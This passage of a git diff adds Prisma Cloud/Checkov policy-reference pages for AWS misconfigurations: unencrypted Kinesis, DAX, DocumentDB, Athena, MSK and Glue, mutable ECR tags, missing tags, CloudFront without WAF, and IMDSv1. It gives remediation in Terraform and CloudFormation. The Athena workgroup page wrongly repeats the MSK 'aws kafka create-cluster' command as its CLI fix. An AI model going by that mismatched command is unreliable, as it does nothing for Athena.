+* *Attribute:* kms_key_id - (Optional) The ARN of the key that you wish to use if encrypting at rest.
+If not supplied, uses service managed encryption.
+Can be specified only if at_rest_encryption_enabled = true.
+
+
+[source,go]
+----
+resource "aws_elasticache_replication_group" "example" {
+  automatic_failover_enabled    = true
+  availability_zones            = ["us-west-2a", "us-west-2b"]
+  replication_group_id          = "tf-rep-group-1"
+  replication_group_description = "test description"
+  node_type                     = "cache.m4.large"
+  number_cache_clusters         = 2
+  parameter_group_name          = "default.redis3.2"
+  port                          = 6379
+
+  at_rest_encryption_enabled = true
+  kms_key_id                 = "arn:ckv"
+}
+----
diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-22.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-22.adoc
new file mode 100644
index 000000000..853be033c
--- /dev/null
+++ b/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-22.adoc
@@ -0,0 +1,138 @@
+
+== AWS Kinesis streaming data unencrypted
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 8fd3611b-3298-483c-a1ec-0df3fc1ded8d
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/cloudformation/checks/resource/aws/KinesisStreamEncryptionType.py[CKV_AWS_43]
+
+|Severity
+|MEDIUM
+
+|Subtype
+|Build
+//Run
+
+|Frameworks
+|CloudFormation,Terraform,TerraformPlan,Serverless
+
+|===
+
+
+
+=== Description
+
+
+Amazon Kinesis Data Firehose is a streaming data pipeline service that can route messages to destinations such as S3, Redshift, Elasticsearch, and others.
+It can also be used to transform data properties before streaming to a defined destination.
+Kinesis provides server-side data encryption to protect sensitive information contained in the data stream.
+We recommend you ensure that your Kinesis streams are encrypted using server-side encryption (SSE).
+
+////
+=== Fix - Runtime
+
+
+AWS Console
+
+
+To change the policy using the AWS Console, follow these steps:
+
+. Log in to the AWS Management Console at https://console.aws.amazon.com/.
+
+. Select Services and search for Kinesis.
+
+. Under the Amazon Kinesis dashboard select Data Firehose from the left navigation panel.
+
+. Select the Firehose Delivery System that needs to be verified and click on the Name to access the delivery stream.
+
+. Select the Details tab and scroll down to Amazon S3 destination.
++
+Check the Encryption value and if it's set to Disabled then the selected Firehose Delivery System data is not encrypted.
+
+. Repeat steps 4 and 5 to verify another Firehose Delivery System.
+
+. To enable the Encryption on selected Firehose Delivery System click on the Name to access the delivery stream.
++
+Under the Details tab, click Edit to make the changes in Amazon S3 destination.
+
+. Click Enable next to the S3 encryption to enable the encryption.
+
+. Select the KMS master key from the dropdown list.
++
+Select the (Default) aws/s3 KMS key or an AWS KMS Customer Master Key (CMK).
+
+. Click Save.
++
+A Successfully Updated message appears.
+
+
+CLI Command
+
+
+Enables or updates server-side encryption using an AWS KMS key for a specified stream.
+
+
+[source,shell]
+----
+aws kinesis start-stream-encryption \
+  --encryption-type KMS \
+  --key-id arn:aws:kms:us-west-2:012345678912:key/a3c4a7cd-728b-45dd-b334-4d3eb496e452 \
+  --stream-name samplestream
+----
+////
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* aws_kinesis_stream
+* *Arguments:* encryption_type - (Optional) The encryption type to use.
+The only acceptable values are NONE or KMS.
+The default value is NONE.
+kms_key_id - (Optional) The GUID for the customer-managed KMS key to use for encryption.
+You can also use a Kinesis-owned master key by specifying the alias alias/aws/kinesis.
+
+
+[source,go]
+----
+resource "aws_kinesis_stream" "test_stream" {
+  ...
+  name = "terraform-kinesis-test"
+
+  encryption_type = "KMS"
+
+  # Use a customer managed key GUID/ARN, or the Kinesis-owned key alias
+  kms_key_id = "alias/aws/kinesis"
+  ...
+}
+----
+
+
+*CloudFormation*
+
+
+* *Resource:* AWS::Kinesis::Stream
+* *Arguments:* Properties.StreamEncryption.EncryptionType
+
+
+[source,yaml]
+----
+Resources:
+  KMSEncryption:
+    Type: AWS::Kinesis::Stream
+    Properties:
+      ...
+      StreamEncryption:
+        ...
+        EncryptionType: KMS
+----
diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-23.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-23.adoc
new file mode 100644
index 000000000..b3dac305d
--- /dev/null
+++ b/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-23.adoc
@@ -0,0 +1,123 @@
+
+== AWS DynamoDB Accelerator (DAX) not encrypted at rest
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| e8980325-125e-4bcd-a0c8-68838ddab811
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/DAXEncryption.py[CKV_AWS_47]
+
+|Severity
+|HIGH
+
+|Subtype
+|Build
+
+|Frameworks
+|CloudFormation,Terraform,TerraformPlan,Serverless
+
+|===
+
+
+
+=== Description
+
+
+AWS DAX encryption at rest provides an additional layer of data protection, helping secure your data from unauthorized access to underlying storage. Without encryption, anyone with access to the storage media or the network traffic between the DAX cluster and the client could potentially intercept and view the data. We recommend enabling encryption at rest.
+
+NOTE: With encryption at rest, the data persisted by DAX on disk is encrypted using 256-bit Advanced Encryption Standard (AES-256).
+
+////
+=== Fix - Runtime
+
+
+AWS Console
+
+
+To change the policy using the AWS Console, follow these steps:
+
+. 
Log in to the AWS Management Console at https://console.aws.amazon.com/.
+
+. Open the https://console.aws.amazon.com/dynamodb/[Amazon DynamoDB console].
+
+. In the navigation pane on the left side of the console, under DAX, select Clusters.
+
+. Click Create Cluster.
+
+. For Cluster name, enter a short name for your cluster.
++
+Select the node type for all of the nodes in the cluster, and for the cluster size, use 3 nodes.
+
+. In Encryption, make sure that Enable encryption is selected.
+
+. After selecting the IAM role, subnet group, security groups, and cluster settings, select Launch cluster.
+
+
+CLI Command
+
+
+To create a DAX cluster:
+
+
+[source,shell]
+----
+aws dax create-cluster \
+  --cluster-name daxcluster \
+  --node-type dax.r4.large \
+  --replication-factor 3 \
+  --iam-role-arn roleARN \
+  --sse-specification Enabled=true
+----
+////
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* aws_dax_cluster
+* *Arguments:* server_side_encryption - (Optional) Encrypt at rest options, enabled/disabled.
+
+
+[source,go]
+----
+resource "aws_dax_cluster" "example" {
+  ...
+  cluster_name = "cluster-example"
++ server_side_encryption {
++   enabled = true
++ }
+  ...
+}
+----
+
+
+*CloudFormation*
+
+
+* *Resource:* AWS::DAX::Cluster
+* *Arguments:* Properties.SSESpecification.SSEEnabled - (Optional) Encrypt at rest options, enabled/disabled.
+
+
+[source,yaml]
+----
+Resources:
+  daxCluster:
+    Type: AWS::DAX::Cluster
+    Properties:
+      ...
++     SSESpecification:
++       SSEEnabled: true
+----
diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-24.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-24.adoc
new file mode 100644
index 000000000..2a9a65882
--- /dev/null
+++ b/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-24.adoc
@@ -0,0 +1,116 @@
+
+== ECR image tags are not immutable
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| cf8ebb0f-cfed-4f57-b60c-8d4a9de1e189
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/ECRImmutableTags.py[CKV_AWS_51]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|CloudFormation,Terraform,TerraformPlan,Serverless
+
+|===
+
+
+
+=== Description
+
+
+Amazon ECR supports immutable tags, preventing image tags from being overwritten.
+
+Tag immutability enables users to rely on the descriptive tags of an image as a mechanism to track and uniquely identify images.
+
+By setting an image tag as immutable, developers can use the tag to correlate the deployed image version with the build that produced the image.
+
+////
+=== Fix - Runtime
+
+
+AWS Console
+
+
+To change the policy using the AWS Console, follow these steps:
+
+. Log in to the AWS Management Console at https://console.aws.amazon.com/.
+
+. Open the https://console.aws.amazon.com/ecr/repositories[Amazon ECR console].
+
+. Select a repository using the radio button.
+
+. Click Edit.
+
+. Enable the Tag immutability toggle.
+
+
+CLI Command
+
+
+To create a repository with immutable tags configured:
+
+
+[source,shell]
+----
+aws ecr create-repository \
+  --repository-name name \
+  --image-tag-mutability IMMUTABLE \
+  --region us-east-2
+----
+
+////
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* aws_ecr_repository
+* *Arguments:* image_tag_mutability - (Optional) The tag mutability setting for the repository.
+Must be one of: MUTABLE or IMMUTABLE.
+Defaults to MUTABLE.
+
+
+[source,go]
+----
+resource "aws_ecr_repository" "example" {
+  ...
+  name = "bar"
++ image_tag_mutability = "IMMUTABLE"
+}
+----
+
+
+
+*CloudFormation*
+
+
+* *Resource:* AWS::ECR::Repository
+* *Arguments:* Properties.ImageTagMutability - (Optional) The tag mutability setting for the repository.
+Must be one of: MUTABLE or IMMUTABLE.
+Defaults to MUTABLE.
+
+
+[source,yaml]
+----
+Resources:
+  MyRepository:
+    Type: AWS::ECR::Repository
+    Properties:
+      ...
++     ImageTagMutability: "IMMUTABLE"
+----
diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-26.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-26.adoc
new file mode 100644
index 000000000..3ba620492
--- /dev/null
+++ b/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-26.adoc
@@ -0,0 +1,92 @@
+== AWS resources that support tags do not have Tags
+
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 3c8e89b8-5f3f-41a5-996e-f2b6083c3605
+
+|Checkov Check ID
+|CKV_AWS_CUSTOM_1
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Terraform,TerraformPlan
+
+|===
+
+
+
+=== Description
+
+
+Many AWS resources support tags. Without tags, it is difficult to organize, manage and track resources.
+Tags allow you to add metadata to a resource to help identify ownership, perform cost / billing analysis, and to enrich a resource with other valuable information, such as descriptions and environment names.
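+
+As an illustration, the AWS Terraform provider also supports a `default_tags` block, which applies a common set of tags to every taggable resource the provider manages (a sketch; the tag keys and values are illustrative):
+
+[source,go]
+----
+provider "aws" {
+  region = "us-east-1"
+
+  # Applied to every taggable resource created through this provider
+  default_tags {
+    tags = {
+      Environment = "dev"
+      Owner       = "apps-team"
+    }
+  }
+}
+----
+
+Resource-level tags are merged with these defaults, and a resource-level value wins when the same key is set in both places.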
+
+While there are many ways that tags can be used, we recommend you follow a consistent tagging practice.
+View AWS's recommended tagging best practices https://d1.awsstatic.com/whitepapers/aws-tagging-best-practices.pdf[here].
+
+////
+=== Fix - Runtime
+
+
+*AWS Console*
+
+
+The procedure varies by resource type.
+Tags can be added in the AWS console by navigating to the specific resource.
+There is usually a "tags" tab in the resource view that can be used to view and modify tags.
+Example to edit tags for a Security Group:
+
+. Navigate to the https://console.aws.amazon.com/ec2/v2/home#Home:[Amazon EC2 console].
+
+. Select Security groups.
+
+. Select a security group to edit, then click the Tags tab.
+
+. Click Manage tags, then Add new tag to add a tag.
+
+. Click Save changes.
+
+
+CLI Command
+
+
+The following command shows how to add tags for any resource associated with the EC2 service (in this case, a security group).
+The specific command varies by resource type for non-EC2 services (e.g., RDS).
+`aws ec2 create-tags --resources sg-000b51bf43c710838 --tags Key=Environment,Value=Dev`
+////
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+The example below shows how to tag a security group in Terraform.
+The syntax is generally the same for any taggable resource type.
+
+
+[source,go]
+----
+resource "aws_security_group" "sg" {
+  name = "my-sg"
+  ...
++ tags = {
++   Environment = "dev"
++   Owner       = "apps-team"
++ }
+}
+----
diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-27.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-27.adoc
new file mode 100644
index 000000000..0c08b85f5
--- /dev/null
+++ b/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-27.adoc
@@ -0,0 +1,100 @@
+== AWS CloudFront web distribution with AWS Web Application Firewall (AWS WAF) service disabled
+
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| a1152fef-3480-45bf-a7dd-eb4de3ed9943
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/cloudformation/checks/resource/aws/WAFEnabled.py[CKV_AWS_68]
+
+|Severity
+|MEDIUM
+
+|Subtype
+|Build
+//Run
+
+|Frameworks
+|CloudFormation,Terraform,TerraformPlan,Serverless
+
+|===
+
+
+
+=== Description
+
+
+AWS WAF gives you control over how traffic reaches your applications by enabling you to create security rules.
+We recommend that you enable AWS WAF for Amazon CloudFront and that you create rules that block common attack patterns, such as SQL injection and cross-site scripting, as well as rules that filter out specific traffic patterns that you have defined.
+With the CloudFront -- WAF integration enabled, you will be able to block any malicious requests made to your CloudFront Content Delivery Network based on the criteria defined in the WAF Web Access Control List (ACL) associated with the CDN distribution.
+
+////
+=== Fix - Runtime
+
+
+CloudFront Console
+
+
+
+. Log in to the CloudFront console at https://console.aws.amazon.com/cloudfront/.
+
+. Choose the ID for the distribution that you want to update.
+
+. On the General tab, click Edit.
+
+. On the Distribution Settings page, in the AWS WAF Web ACL list, choose the web ACL that you want to associate with this distribution.
+
+. 
If you want to disassociate the distribution from all web ACLs, choose None. ++ +If you want to associate the distribution with a different web ACL, choose the new web ACL. + +. Click Yes, Edit. +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_cloudfront_distribution +* *Arguments:* web_acl_id (Optional) - If you're using AWS WAF to filter CloudFront requests, the Id of the AWS WAF web ACL that is associated with the distribution. + +The WAF Web ACL must exist in the WAF Global (CloudFront) region and the credentials configuring this argument must have waf:GetWebACL permissions assigned. +If using WAFv2, provide the ARN of the web ACL. + + +[source,go] +---- +resource "aws_cloudfront_distribution" "example" { + ... + enabled = true + is_ipv6_enabled = false ++ web_acl_id = aws_wafv2_web_acl.example.id + ... +} +---- + + +*CloudFormation* + + +* *Resource:* AWS::CloudFront::Distribution +* *Arguments:* Properties.DistributionConfig.WebACLId + + +[source,yaml] +---- +Type: 'AWS::CloudFront::Distribution' + Properties: + ... + DistributionConfig: + ... 
+ WebACLId: arn:aws:wafv2:us-east-1:123456789012:global/webacl/ExampleWebACL/12345 +---- diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-28.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-28.adoc new file mode 100644 index 000000000..82420bdff --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-28.adoc @@ -0,0 +1,94 @@ + +== DocumentDB is not encrypted at rest + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 08e1e43c-e9e3-40a2-8201-65147b3a9dfd + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/DocDBEncryption.py[CKV_AWS_74] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|CloudFormation,Terraform,TerraformPlan,Serverless + +|=== + + + +=== Description + + + +AWS DocumentDB clusters encryption at rest provides an additional layer of data protection by helping secure your data against unauthorized access to the underlying storage. On a cluster running with Amazon DocumentDB encryption, data stored at rest in the underlying storage is encrypted, as are its automated backups, snapshots, and replicas in the same cluster. We recommend enabling encryption at rest. + +//// +=== Fix - Runtime + + +Procedure + + + +. Create an Amazon DocumentDB cluster. + +. Under the Authentication section, choose Show advanced settings. + +. Scroll down to the Encryption-at-rest section. + +. Choose the option that you want for encryption at rest. ++ +Whichever option you choose, you can't change it after the cluster is created. ++ +To encrypt data at rest in this cluster, choose Enable encryption. 
+
+
+CLI Command
+
+
+
+
+[source,shell]
+----
+aws docdb create-db-cluster \
+  --db-cluster-identifier sample-cluster \
+  --port 27017 \
+  --engine docdb \
+  --master-username yourMasterUsername \
+  --master-user-password yourMasterPassword \
+  --storage-encrypted
+----
+
+////
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* aws_docdb_cluster
+* *Arguments:* storage_encrypted - Specifies whether the DB cluster is encrypted.
+
+
+[source,go]
+----
+resource "aws_docdb_cluster" "example" {
+  ...
+  cluster_identifier = "docdb-cluster-demo"
++ storage_encrypted = true
+  ...
+}
+----
diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-29.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-29.adoc
new file mode 100644
index 000000000..0eb5a1f91
--- /dev/null
+++ b/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-29.adoc
@@ -0,0 +1,84 @@
+
+== Athena Database is not encrypted at rest
+
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 0f8ad1a1-47e9-4336-a582-2d6dcf63bf95
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/AthenaDatabaseEncryption.py[CKV_AWS_77]
+
+|Severity
+|MEDIUM
+
+|Subtype
+|Build
+
+|Frameworks
+|Terraform,TerraformPlan
+
+|===
+
+
+
+=== Description
+
+
+
+AWS Athena is a query service managed by AWS that uses standard SQL to analyze data directly in Amazon S3.
+Encryption of data while in transit between Amazon Athena and S3 is provided by default using SSL/TLS, but encryption of query results at rest is not enabled by default.
+Athena encryption at rest provides an additional layer of data protection by helping secure your data against unauthorized access to the underlying Amazon S3 storage. We recommend enabling encryption at rest.
+
+////
+=== Fix - Runtime
+
+
+AWS Console
+
+
+
+. 
Log in to the AWS Management Console at https://console.aws.amazon.com/. + +. Open the Amazon Athena console. + +. In the Athena console, choose Settings. + +. Choose Encrypt query results. + +. For Encryption select either CSE-KMS, SSE-KMS, or SSE-S3. + +. If your account has access to an existing AWS KMS customer managed key (CMK), choose its alias or choose Enter a KMS key ARN, then enter an ARN. + +. Click Save. +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_athena_database +* *Arguments:* encryption_configuration - (Optional) The encryption key block AWS Athena uses to decrypt the data in S3, such as an AWS Key Management Service (AWS KMS) key. + +An encryption_configuration block is documented below. + + +[source,go] +---- +resource "aws_athena_database" "example" { + ... + name = "database_name" ++ encryption_configuration { ++ encryption_option = var.encryption_option ++ kms_key = var.kms_key_arn ++ } + ... +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-30.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-30.adoc new file mode 100644 index 000000000..4daf2e569 --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-30.adoc @@ -0,0 +1,92 @@ + +== CodeBuild project encryption is disabled + + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 1d84f4c4-fc12-40e5-9b65-44c05b7dafc3 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/CodeBuildProjectEncryption.py[CKV_AWS_78] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|CloudFormation,Terraform,TerraformPlan,Serverless + +|=== + + + +=== Description + + + +AWS CodeBuild is a fully managed build service in the cloud, that compiles source code, runs unit tests, and produces artifacts that are ready to deploy. 
+ +We recommend enabling CodeBuild project encryption to protect sensitive information such as passwords and other credentials required to access external services during the build process, from security breaches. + +NOTE: Build artifacts, such as a cache, logs, exported raw test report data files, and build results are encrypted by default using CMKs for Amazon S3 that are managed by the AWS Key Management Service. + +If you do not want to use these CMKs, you must create and configure a customer-managed CMK. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_codebuild_project +* *Arguments:* encryption_disabled - (Optional) If set to true, output artifacts will not be encrypted. + +If type is set to NO_ARTIFACTS then this value will be ignored. +Defaults to false. +To fix, either set to false or remove attribute. + + +[source,go] +---- +resource "aws_codebuild_project" "project-with-cache" { + ... + name = "test-project-cache" + artifacts { ++ encryption_disabled = false + } + ... +} +---- + + + +*CloudFormation* + + +* *Resource:* AWS::CodeBuild::Project +* *Arguments:* Properties.Artifacts - (Optional) If set to true, output artifacts will not be encrypted. + +If type is set to NO_ARTIFACTS then this value will be ignored. +Defaults to false. + + +[source,yaml] +---- +Resources: + CodeBuildProject: + Type: AWS::CodeBuild::Project + Properties: + ... + Artifacts: + ... 
+ Type: S3 +- EncryptionDisabled: True ++ EncryptionDisabled: False +---- diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-31.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-31.adoc new file mode 100644 index 000000000..e36e50e51 --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-31.adoc @@ -0,0 +1,107 @@ +== AWS EC2 instance not configured with Instance Metadata Service v2 (IMDSv2) + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 32f75d19-c34d-4ec5-aa8c-675959db3aad + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/cloudformation/checks/resource/aws/IMDSv1Disabled.py[CKV_AWS_79] + +|Severity +|MEDIUM + +|Subtype +|Build, +//Run + +|Frameworks +|CloudFormation,Terraform,TerraformPlan,Serverless + +|=== + + + +=== Description + + +The Instance Metadata Service (IMDS) is an on-instance component used by code on the instance to securely access instance metadata. + +You can access instance metadata from a running instance using one of the following methods: + +* Instance Metadata Service Version 1 (IMDSv1) -- a request/response method +* Instance Metadata Service Version 2 (IMDSv2) -- a session-oriented method + +As a request/response method IMDSv1 is prone to local misconfigurations: + +* Open proxies, open NATs and routers, server-side reflection vulnerabilities. +* One way or another, local software might access local-only data. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_instance +* *Arguments:* http_tokens - (Optional) Whether or not the metadata service requires session tokens, the mechanism used for Instance Metadata Service Version 2. + +Can be "optional" or "required". +(Default: "optional"). 
+*Set to "required" to enable Instance Metadata Service V2.*
+Alternatively, disable the metadata service altogether by setting `http_endpoint = "disabled"`.
+
+
+[source,go]
+----
+resource "aws_instance" "example" {
+  ...
+  instance_type = "t2.micro"
++ metadata_options {
+    ...
++   http_endpoint = "enabled"
++   http_tokens   = "required"
++ }
+  ...
+}
+----
+
+If setting `http_tokens = "required"` in a launch template that is being used for an EKS worker/node group, you should consider setting `http_put_response_hop_limit = 2` per the https://aws.amazon.com/about-aws/whats-new/2020/08/amazon-eks-supports-ec2-instance-metadata-service-v2/[default behavior in EKS].
+Without this setting, the default service account in EKS will not be able to access the instance metadata service.
+
+
+*CloudFormation*
+
+
+* *Resource:* AWS::EC2::LaunchTemplate
+* *Arguments:* Properties.MetadataOptions.HttpEndpoint / Properties.MetadataOptions.HttpTokens
+
+
+[source,yaml]
+----
+Resources:
+  IMDSv1Disabled:
+    Type: AWS::EC2::LaunchTemplate
+    Properties:
+      ...
+      LaunchTemplateData:
+        ...
++       MetadataOptions:
++         HttpEndpoint: disabled
+
+  IMDSv2Enabled:
+    Type: AWS::EC2::LaunchTemplate
+    Properties:
+      ...
+      LaunchTemplateData:
+        ...
++       MetadataOptions:
++         HttpTokens: required
+----
diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-32.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-32.adoc
new file mode 100644
index 000000000..09406c340
--- /dev/null
+++ b/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-32.adoc
@@ -0,0 +1,87 @@
+== MSK cluster encryption at rest and in transit is not enabled
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 33a02806-aa4b-4c6a-b753-3f7de6e6313c
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/MSKClusterEncryption.py[CKV_AWS_81]
+
+|Severity
+|MEDIUM
+
+|Subtype
+|Build
+
+|Frameworks
+|Terraform,TerraformPlan
+
+|===
+
+
+
+=== Description
+
+
+Amazon MSK integrates with AWS Key Management Service (KMS) for server-side encryption.
+When you create an MSK cluster, you can specify the AWS KMS CMK for Amazon MSK to use to encrypt your data at rest.
+If you don't specify a CMK, Amazon MSK creates an AWS managed CMK for you and uses it on your behalf.
+We recommend using encryption in transit and at rest to secure your managed Kafka queue.
+
+////
+=== Fix - Runtime
+
+
+CLI Command
+
+
+Run the create-cluster command and use the encryption-info option to point to the file where you saved your configuration JSON.
+
+
+[source,shell]
+----
+aws kafka create-cluster \
+  --cluster-name "ExampleClusterName" \
+  --broker-node-group-info file://brokernodegroupinfo.json \
+  --encryption-info file://encryptioninfo.json \
+  --kafka-version "2.2.1" \
+  --number-of-broker-nodes 3
+----
+////
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* aws_msk_cluster
+* *Arguments:* encryption_info - (Optional) Configuration block for specifying encryption.
+encryption_in_transit - (Optional) Configuration block to specify encryption in transit.
+
+See below.
+
+
+[source,go]
+----
+resource "aws_msk_cluster" "example" {
+  cluster_name = "example"
+  ...
+
+  encryption_info {
+    encryption_at_rest_kms_key_arn = aws_kms_key.kms.arn
+
+    encryption_in_transit {
+      client_broker = "TLS"
+      in_cluster    = true
+    }
+  }
+  ...
+}
+----
diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-33.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-33.adoc
new file mode 100644
index 000000000..175481e87
--- /dev/null
+++ b/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-33.adoc
@@ -0,0 +1,120 @@
+== Athena workgroup does not prevent disabling encryption
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| e185eb37-795d-4cbc-84ac-e9f1cfa99739
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/AthenaWorkgroupConfiguration.py[CKV_AWS_82]
+
+|Severity
+|MEDIUM
+
+|Subtype
+|Build
+
+|Frameworks
+|CloudFormation,Terraform,TerraformPlan,Serverless
+
+|===
+
+
+
+=== Description
+
+
+You can configure settings at the workgroup level to enforce control over queries that run in the workgroup.
+If a query runs in a workgroup and the workgroup overrides client-side settings, Athena uses the workgroup's settings for encryption.
+It also overrides any other settings specified for the query in the console, through API operations, or with drivers.
+
+////
+=== Fix - Runtime
+
+
+CLI Command
+
+
+Run the create-cluster command and use the encryption-info option to point to the file where you saved your configuration JSON.
+
+
+[source,shell]
+----
+aws kafka create-cluster \
+  --cluster-name "ExampleClusterName" \
+  --broker-node-group-info file://brokernodegroupinfo.json \
+  --encryption-info file://encryptioninfo.json \
+  --kafka-version "2.2.1" \
+  --number-of-broker-nodes 3
+----
+////
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* aws_athena_workgroup
+* *Arguments:* enforce_workgroup_configuration - (Optional) Boolean whether the settings for the workgroup override client-side settings.
+
+For more information, see Workgroup Settings Override Client-Side Settings.
+Defaults to true.
+
+
+[source,go]
+----
+resource "aws_athena_workgroup" "example" {
+  name = "example"
+  ...
+  configuration {
+    enforce_workgroup_configuration    = true
+    publish_cloudwatch_metrics_enabled = true
+
+    result_configuration {
+      output_location = "s3://${aws_s3_bucket.example.bucket}/output/"
+
+      encryption_configuration {
+        encryption_option = "SSE_KMS"
+        kms_key_arn       = aws_kms_key.example.arn
+      }
+    }
+  }
+}
+----
+
+
+*CloudFormation*
+
+
+* *Resource:* AWS::Athena::WorkGroup
+* *Arguments:* Properties.WorkGroupConfiguration.EnforceWorkGroupConfiguration
+
+
+[source,yaml]
+----
+Resources:
+  MyAthenaWorkGroup:
+    Type: AWS::Athena::WorkGroup
+    Properties:
+      ...
++     WorkGroupConfiguration:
++       EnforceWorkGroupConfiguration: true
+      ...
+----
diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-37.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-37.adoc
new file mode 100644
index 000000000..3ca09aca2
--- /dev/null
+++ b/code-security/policy-reference/aws-policies/aws-general-policies/bc-aws-general-37.adoc
@@ -0,0 +1,98 @@
+== Glue Data Catalog encryption is not enabled
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| e2dd25ba-7500-4de9-8a71-903cf1e7542f
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/cloudformation/checks/resource/aws/GlueDataCatalogEncryption.py[CKV_AWS_94]
+
+|Severity
+|HIGH
+
+|Subtype
+|Build
+
+|Frameworks
+|CloudFormation,Terraform,TerraformPlan,Serverless
+
+|===
+
+
+
+=== Description
+
+
+This policy examines the resource *aws_glue_data_catalog_encryption_settings* and checks that encryption is set up.
+The properties *encrypted_at_rest* and *connection_encrypted* in the blocks *connection_password_encryption* and *encryption_at_rest* are examined.
+
+////
+=== Fix - Runtime
+
+
+AWS Console
+
+
+TBA
+
+
+CLI Command
+////
+
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource* aws_glue_data_catalog_encryption_settings
+* *Arguments* data_catalog_encryption_settings/connection_password_encryption and data_catalog_encryption_settings/encryption_at_rest blocks
+
+
+[source,go]
+----
+resource "aws_glue_data_catalog_encryption_settings" "example" {
+  ...
++ data_catalog_encryption_settings {
++   connection_password_encryption {
++     aws_kms_key_id                       = aws_kms_key.glue.arn
